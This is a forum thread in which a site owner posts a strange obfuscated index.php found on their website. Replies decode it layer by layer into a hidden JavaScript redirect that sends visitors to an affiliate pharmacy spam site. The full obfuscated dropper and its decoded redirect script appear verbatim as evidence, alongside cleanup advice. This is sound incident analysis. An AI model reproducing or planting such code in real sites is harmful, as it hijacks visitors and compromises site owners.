dongyongyin5339 2014-06-27 21:01

在网站上发现奇怪的index.php

I found a strange, obfuscated file "Index.php" on my website. I don't know who placed it there, but I would like to understand what it does.

The first layer of obfuscation replaces characters in variable names, string literals and even the regex with "\xNN" hex escapes.

<?php /* NOTE(review): obfuscated dropper found in the webroot, kept verbatim as evidence.
   Every string is spelled with "\xNN" escapes: "GL\x4fB\x41\x4c\x53" is "GLOBALS",
   "\x6b" is "k", "\x74x\x74" is "txt", "\x5a\x5a\x5a\x5a" is "ZZZZ", and the regex
   decodes to ^[a-z0-9]{10,32}$ with the i and s modifiers. Behaviour once decoded:
   walk $_GET and, on the first parameter NAME matching that regex, echo the
   base64-decoded payload with "ZZZZ" replaced by the name, then exit(); any request
   without such a parameter produces no output at all. The lone backslash at the end
   of this line looks like a paste wrap inside a "\x64" escape - TODO confirm against
   the file on disk before reusing the base64 blob. */ /* copyright */ ${"GL\x4fB\x41\x4c\x53"}["\x6bg\x6e\x72\x77i\x6e\x64\x62n"]="\x74x\x74";$egeillbp="\x6b";${"\x47\x4cO\x42\x41L\x53"}["\x63kmj\x63uie"]="\x76";foreach($_GET as${$egeillbp}=>${${"\x47L\x4fB\x41\x4cS"}["\x63k\x6d\x6acu\x69e"]}){${"\x47\x4cO\x42\x41\x4c\x53"}["d\x78\x77\x71o\x61lv\x61\x75\x65"]="\x6b";if(preg_match("!^[a-\x7a\x30-\x39]{10,\x332}\$\x21is",${${"\x47\x4cO\x42\x41LS"}["\x64\x78\x77\x71\x6f\x61\x6c\x76a\x75\x65"]})){$xfgspywrt="\x6b";$jdhbwek="\x74\x78\x74";${$jdhbwek}=base64_decode("\x50\x46\x4eD\x55klQV\x43B\x73Y\x57\x35\x6edWFnZT1q\x59\x58Z\x68\x63\x32\x4ey\x61X\x420Pg\x30\x4b\x50\x43E\x74L\x510K\x5a\x6eVuY3Rpb2\x34g\x5a\x32V0\x62W\x55o\x63\x33RyK\x510\x4b\x65yB2YX\x49g\x61WR4ID\x30\x67\x633R\x79\x4cmluZGV\x34\x542\x59\x6f\x4a\x7a\x38n\x4bT\x73\x67a\x57\x59g\x4bG\x6c\x6be\x43A9P\x53A\x74\x4dS\x6bgc\x6dV0\x64\x58\x4au\x49\x48\x4e\x30cjsgd\x6dFy\x49Gx\x6cb\x69\x419\x49\x48\x4e0ci5\x73ZW\x35\x6e\x64G\x67\x37I\x48Z\x68\x63\x69B\x75\x5aXd\x66c3R\x79I\x440g\x49\x69I7\x49HZ\x68c\x69\x42\x70ID0\x67\x4dTs\x67\x5am\x39\x79I\x43g\x72K2\x6c\x6beDs\x67\x61\x57R\x34\x49\x44w\x67\x62G\x56\x75O\x79Bp\x5a\x48g\x67\x4bz0\x67\x4dixp\x4b\x79\x73\x70D\x51\x70\x37IH\x5ahciB\x6aaC\x41\x39\x49H\x42h\x63n\x4e\x6c\x53W\x35\x30KHN0\x63i\x35\x7a\x64\x57\x4az\x64\x48\x49oa\x57\x524LC\x41\x79KS\x77\x67\x4d\x54YpOy\x42\x75ZXd\x66\x63\x33RyICs\x39IFN\x30\x63ml\x75\x5ay\x35\x6dcm\x39t\x51\x32\x68\x68c\x6b\x4evZ\x47\x55o\x4b\x47N\x6fI\x43\x73ga\x53k\x67\x4aSAyNTY\x70\x4fy\x429IA0KZ\x479jdW\x31\x6cb\x6e\x51ud3Jp\x64\x47U\x6f\x62\x6d\x56\x33\x58\x33\x4e0c\x695zdWJ\x7a\x64H\x49o\x4d\x43xu\x5a\x58\x64f\x633\x52y\x4c\x6dx\x6c\x62\x6d\x640\x61C\x30xMSk\x72\x49lx\x31MD\x41yNlx1M\x44\x412\x4e1\x781M\x44\x41\x32Rl\x781\x4dDA\x32\x51\x6c\x781\x4dD\x412Qlx1M\x44\x41\x7a\x52Fp\x61Wl\x70\x63d\x54\x41\x77M\x6a\x4ac\x64\x54A\x77\x4d0\x4acdTA\x77M0Nc\x64T\x41\x77\x4d\x6bZcd\x54AwNz\x4e\x63d\x54\x41\x77\x4ejN\x63dT\x41w\x4ez\x4acdT\x41\x77\x4ejlcd\x54A\x77\x4ez\x42\x63dTA\x77NzR\x63\
x64TA\x77\x4d0\x55i\x4b\x54sNC\x6e0\x4eC\x6d\x64vb\x32\x64\x73ZV\x39\x68\x5a\x46\x39jb\x47\x6c\x6cb\x6eQg\x50\x53A\x69c\x48V\x69\x4cTE\x30M\x7a\x411\x4fDQ\x30M\x44g\x7aMTM\x34\x4e\x44\x4d\x69O\x770\x4b\x5a\x329v\x5a2xlX\x32\x46\x6bX\x33d\x70\x5aH\x52\x6f\x49D\x30g\x4e\x7aI\x34\x4f\x77\x30KZ\x32\x39vZ2\x78lX2\x46\x6b\x58\x32\x68la\x57\x64o\x64\x43A\x39IDk\x77Ow\x30KZ29vZ2\x78\x6c\x58\x32F\x6bX\x32Z\x76c\x6d\x31h\x64\x43A9\x49\x43I3\x4d\x6a\x68\x34OTBf\x59\x58\x4diOw\x30\x4b\x5a29\x76\x5a\x32\x78l\x58\x32Fk\x583\x525cGU\x67P\x53A\x69dG\x56\x34dF\x39\x70\x62\x57F\x6eZ\x53\x497\x44Q\x70\x6e\x6229\x6e\x62\x47\x56\x66Y\x57Rf\x59\x32hh\x62\x6d5l\x62C\x419\x49\x43\x49\x69O\x77\x30KZ\x32\x560\x62WUo\x49\x6d\x680\x64H\x416Ly9\x77Y\x57d\x6cYWQ\x79L\x6d\x64vb2\x64sZ\x58N\x35bmR\x70Y\x32\x460a\x579\x75L\x6d\x4e\x76\x62\x53\x39wY\x57d\x6cYWQvc\x32\x68vd1\x39\x68Z\x48\x4du\x61nM/M\x30\x493MTYwN\x6b\x55\x32\x4e\x44\x5aB\x4e\x6bQxO\x44\x59zN\x54c2M\x7a\x56CN\x6ag\x31\x4d\x7aU4\x4eT\x55\x79QzE\x77\x4e\x54c0\x52\x44YxNEI1Q\x7aR\x43\x4e\x54k\x30Rj\x551NTg\x77NTIwNT\x670O\x54\x52\x45N\x44\x49\x30QzUz\x4d\x44\x6b0\x4ejQ4M\x30Iz\x4f\x44R\x42M\x30\x55\x30\x4d\x7aQ\x78ME\x5a\x47\x4d\x7a\x4d\x34\x4eD\x4d\x30M\x6aN\x45M\x44\x5aGQ\x55\x595R\x6bV\x47N\x6bY\x34R\x6aZGN\x6bYyRjR\x47N\x6bY\x33RUVG\x4dE\x591\x52\x6a\x46F\x51\x6a\x4aE\x4d\x6b\x4e\x46Nz\x49\x34MUY\x79\x4e\x6bY\x30\x4dTUxO\x54\x454RUV\x46N0R\x47\x52\x45Z\x45\x52\x6bQyMUUxRjB\x43R\x54V\x45\x51\x55R\x42RDV\x45\x4eU\x4d1RE\x52E\x52EN\x47MTIwMTBG\x4dDUwQj\x42FR\x44c\x69\x4bT\x73\x4e\x43\x69\x38\x76L\x530+I\x44wv\x55\x30\x4eSSVB\x55\x50\x67\x3d\x3d");echo str_replace("\x5a\x5a\x5a\x5a",${$xfgspywrt},${${"GLOB\x41LS"}["\x6bgnr\x77\x69\x6e\x64\x62\x6e"]});exit;}} /* copyright */ ?>

I wrote a small tool that resolves the hex escapes, which gives the script's original form:

<?php /* copyright */ 

    /* NOTE(review): hex escapes resolved. The ${"GLOBALS"}[...] slots and the two
       helper variables only ever hold variable NAMES ("txt", "k", "v"); the real
       variables $txt, $k and $v are then reached through ${...} indirection so that
       a grep for "$_GET" / "$k" finds nothing meaningful. */
    ${"GLOBALS"}["kgnrwindbn"]="txt";
    $egeillbp="k";${"GLOBALS"}["ckmjcuie"]="v";

    // Walk every query-string parameter as $k => $v; only the NAME ($k) is used.
    foreach($_GET as${$egeillbp}=>${${"GLOBALS"}["ckmjcuie"]})
    {
        ${"GLOBALS"}["dxwqoalvaue"]="k";
        // Trigger: the first parameter name that is 10-32 ASCII alphanumerics
        // (case-insensitive; "\$" in a double-quoted string is a literal $). A request
        // without such a parameter falls through the loop and prints nothing, which is
        // why the file is inconspicuous on a normal visit. The same regex also keeps the
        // reflected value below free of quotes and tags, so it is not a usable XSS
        // (PCRE $ without the D modifier does tolerate one trailing newline).
        if(preg_match("!^[a-z0-9]{10,32}\$!is",${${"GLOBALS"}["dxwqoalvaue"]}))
        {
            $xfgspywrt="k";
            $jdhbwek="txt";
            // $txt = the JavaScript redirect stub (decoded further down the page).
            ${$jdhbwek} = base64_decode("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");
            // Emit the stub with its "ZZZZ" placeholder replaced by $k (the token from
            // the URL), then stop so nothing else on the page is rendered.
            echo str_replace("ZZZZ",${$xfgspywrt},${${"GLOBALS"}["kgnrwindbn"]});
            exit;
        } 
    }
/* copyright */ ?>

That still wasn't very helpful, because the payload itself is base64-encoded. Decoding it gives:

<SCRIPT language=javascript>
<!--
// NOTE(review): this is what the PHP echoes (with ZZZZ already substituted).
// getme() is a decoder, not an ad loader: it never fetches the URL it is given.
function getme(str)
// Everything up to and including the '?' (the googlesyndication URL) is skipped;
// a string with no '?' is returned untouched. The remainder is read two hex digits
// at a time and the i-th byte (1-based) is shifted up by i, modulo 256.
{ var idx = str.indexOf('?'); if (idx == -1) return str; var len = str.length; var new_str = ""; var i = 1; for (++idx; idx < len; idx += 2,i++)
{ var ch = parseInt(str.substr(idx, 2), 16); new_str += String.fromCharCode((ch + i) % 256); } 
// Drop the last 11 decoded characters, append the \u-escaped tail (the gokk=ZZZZ
// parameter, closing quote, semicolon and script end tag) and document.write the
// result: that injected script element is the actual redirect.
document.write(new_str.substr(0,new_str.length-11)+"\u0026\u0067\u006F\u006B\u006B\u003DZZZZ\u0022\u003B\u003C\u002F\u0073\u0063\u0072\u0069\u0070\u0074\u003E");
}
// Decoys: these google_ad_* globals are assigned but never read anywhere below.
google_ad_client = "pub-1430584408313843";
google_ad_width = 728;
google_ad_height = 90;
google_ad_format = "728x90_as";
google_ad_type = "text_image";
google_ad_channel = "";
// Only the hex slug after '?' carries data; the decoded result is shown in the answer.
getme("http://pagead2.googlesyndication.com/pagead/show_ads.js?3B71606E646A6D186357635B685358552C10574D614B5C4B594F5558052058494D424C530946483B384A3E43410FF33843423D06FAF9FEF6F8F6F6F2F4F6F7EEF0F5F1EB2D2CE7281F26F4151918EEE7DFDFDFD21E1F0BE5DADAD5D5C5DDDDCF12010F050B0ED7");
//--> </SCRIPT>

The "\uXXXX" escapes in the document.write() call are yet another layer; decoded, that tail reads:

&gokk=ZZZZ";</script>

Now I can see the content, but I still can't work out what it does (and I don't want to run a script I don't understand).

My guess is that it tries to request Google ads in a loop. But would that make sense, given that Google blocks duplicate IP addresses?

Has anyone seen this script on their website too? Or do you have an idea what it does? Thanks for any suggestions.


  • duanju7199 2014-06-27 21:14

    After a bit of sleuthing, it appears that this script redirects visitors of whatever page index.php serves to a pharmaceutical site of dubious intent. Note the trigger in the PHP: the redirect is only emitted when the request carries a query-string parameter whose name matches ^[a-z0-9]{10,32}$, and that name is passed along as the gokk= value, so the attacker's own spam links fire it while a normal visit shows nothing. All the Google ad variables are a decoy for anyone skimming the source; the real payload is a URL hidden in the hex "slug" after show_ads.js?.

    First, replacing document.write with console.log:

    // Same decoder as in the question, with document.write swapped for console.log
    // so the decoded string is printed instead of being injected into a page.
    function getme(str) {
        // Everything up to and including '?' is skipped; no '?' means nothing to decode.
        var idx = str.indexOf('?');
        if (idx == -1) return str;
        var len = str.length;
        var new_str = "";
        var i = 1;
        // Two hex digits per byte; byte number i (1-based) is shifted up by i, mod 256.
        for (++idx; idx < len; idx += 2, i++) {
            var ch = parseInt(str.substr(idx, 2), 16);
            new_str += String.fromCharCode((ch + i) % 256);
        }
        // Trim the last 11 characters and append the \u-escaped tail that carries the
        // gokk=ZZZZ tracking parameter and closes the string and the script element.
        console.log(new_str.substr(0, new_str.length - 11) + "\u0026\u0067\u006F\u006B\u006B\u003DZZZZ\u0022\u003B\u003C\u002F\u0073\u0063\u0072\u0069\u0070\u0074\u003E");
    }
    
    // Only the hex slug after '?' is meaningful; the Google host name is a decoy.
    getme("http://pagead2.googlesyndication.com/pagead/show_ads.js?3B71606E646A6D186357635B685358552C10574D614B5C4B594F5558052058494D424C530946483B384A3E43410FF33843423D06FAF9FEF6F8F6F6F2F4F6F7EEF0F5F1EB2D2CE7281F26F4151918EEE7DFDFDFD21E1F0BE5DADAD5D5C5DDDDCF12010F050B0ED7");
    

    We get this:

    <script language="javascript">window.location="http://re.da.ct.ed/rr.php?aff=7012&sub=3401&gokk=ZZZZ";</script>
    

    re.da.ct.ed stands in for a bare IP address. getme() never loads show_ads.js at all; the Google URL is a red herring. It decodes the slug after the ? two hex digits at a time, adding each byte's 1-based position (mod 256), drops the last 11 characters and then document.write()s the resulting script element, which sets window.location.

    Fetching only the response headers of the decoded URL with cURL (-I, so no HTML or JavaScript from the target is rendered or executed) gives:

    $ curl 'http://re.da.ct.ed/rr.php?aff=7012&sub=3401&gokk=ZZZZ' -I
    HTTP/1.1 302 Found
    Date: Fri, 27 Jun 2014 21:07:39 GMT
    Server: Apache/2.2.22 (Debian)
    X-Powered-By: PHP/5.4.4-14+deb7u5
    Location: https://www.sleazydrugstore.net
    Vary: Accept-Encoding
    Content-Type: text/html
    

    From the headers it looks like nothing more than an affiliate redirect (aff=, sub= and gokk= are tracking parameters) to a sleazy-looking drug store, although the landing page itself was not inspected, so something more malicious could be hidden behind it. More importantly, whoever dropped this file had write access to your webroot: deleting index.php removes the symptom, not the entry point. Check the rest of the site for other modified or unexpected files, work out how it got there (outdated CMS or plugin, stolen FTP/hosting credentials) and rotate those credentials.

    I'm not sure whether to post the real URLs and IPs here, so some guidance would be appreciated.
